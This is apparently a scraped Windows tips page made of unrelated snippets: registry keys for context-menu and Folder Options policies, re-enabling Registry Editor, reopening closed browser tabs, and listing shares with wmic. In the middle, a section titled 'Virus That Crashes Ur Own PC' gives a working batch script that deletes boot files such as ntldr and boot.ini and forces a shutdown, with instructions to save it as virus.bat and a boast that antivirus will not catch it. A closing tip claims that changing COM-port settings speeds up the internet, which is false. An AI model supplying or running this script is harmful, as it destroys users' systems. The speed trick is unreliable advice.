OKI DOKI that's all for this article. Hope you will find this article very easy to understand and implement.

Disable the Ability to Right Click on the Desktop:

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Value Name: NoViewContextMenu
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disabled, 1 = enabled)

How to Enable Tools -> Folder Options and Registry Editor in Windows

Many times Windows users face a common problem. The "Folder Options" in "Tools" menu is not visible. Even It can't be accessed from Control Panel. Also "Registry Editor" is disabled.

If you are also facing this problem, then you have come to right place. Follow the simple steps mentioned in this tutorial and your problem will be solved:

1. If Folder Options is disabled but Registry Editor is still working in your system, then you can enable Folder Options by editing Windows Registry. Type regedit in RUN dialog box and press Enter. it'll open Registry Editor, now go to following keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Policies\Explorer

In right-side pane, check whether a DWORD value named NoFolderOptions exists or not? If it exists, delete it.

2. If you are not familiar with editing the registry, then you can simply download following file, extract it and then run the .REG file:

folder_options.zip

3. But sometimes Registry Editor is also disabled. Whenever you try to open regedit, Windows will show following error message:

Registry Editor has been disabled by administrator.

Its a symptom of "RONTOKBRO" Trojan. To remove this trojan, follow the instructions given in following topic:

Is Your System Infected with a Virus / Spyware / Adware / Trojan?

4. If its not a trojan problem and someone intentionally has disabled it in your system, then you can enable it again by following any of these methods:

a. Type gpedit.msc in RUN dialog box and goto:

User Configuration -> Administrative Templates -> System

in right-side pane, set "Prevent access to Registry editing tools" to either Not Configured orDisabled.

b. Just type following in RUN dialog box and press 
:

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Now after enabling Registry Editor, you can re-enable Folder Options by following methods mentioned in 1st or 2nd steps.

Virus That Crashes Ur Own PC

@echo
offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save as bat file in notepad!!
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!

Type this in notepad

start virus.bat
virus.bat
and save as with this name - virus.bat

ur antivirus will not detect this virus.

Basically this program will delete all that files which are needed for bootingIf your os is installed in d drive instead of c then replace c with d.

How to open accidentaly closed tabs in Firefox

An annoying problem with Firefox's tabbed user interface is the accidental closing of tabs. This happens mostly when users switch between tabs, mistakenly clicking the little close button in the tabs top right corner.
Luckily Firefox has a nice feature which provides a simple solution to this problem. You can re-pen recently closed tabs by clicking History-> Recently Closed Tabs

How to list all shared drives and folders from the command line in Windows XP, Vista, 2003

Use this quick and very simple way to list all your shared drives and folders using the command line. This works on Windows XP, Vista, Server 2003, Server 2008 across all versions. Here's how you do it:

- Click Start -> Run

-Type cmd and press Enter (This launches the command prompt)

- Type the following code in the command prompt window:

wmic share get caption,name,path

How to reopen a closed tab in Google Chrome

You finally get to the webpage you've been surfing for and now you've accidentally closed the tab. This can be a very frustrating situation. Chrome is quite forgiving and allows you to easily reopen the closed tab, even if you've closed other tabs after it.
Using a Keyboard Shortcut:
By using the keyboard shortcut Ctrl+Shift+T, Chrome will open the last tab that was closed. Use the keyboard shortcut again, and it will open the tab that was closed before that, and so on. You can use this method to restore up to the last 10 tabs that have been closed during your browsing session.

Using the New Tab Page:
Open up a new tab. Go to Recently closed tabs section located in the lower-right of the page. You will find the last 3 tabs that have recently been closed during your browser session.

Increase your internet speed by other tricks!

1: go to ur desktop
2: right click on "My computer"
3: den select "properties"
4: den click on "HARDWARE" tab
5: den click "Device manager"
6: now u see a new window(Device manager window)
7: look down now u can see "Ports(COM & LPT)" ...click on it
8:den double click on "Communication Ports"
9: after open u can see a "Communication Port properties"..
10: now go the "Port Setting"
11: and now change ur "Bits per second" to "128000".
12: and "Flow control" change 2 "Hardware".

apply and see the result.........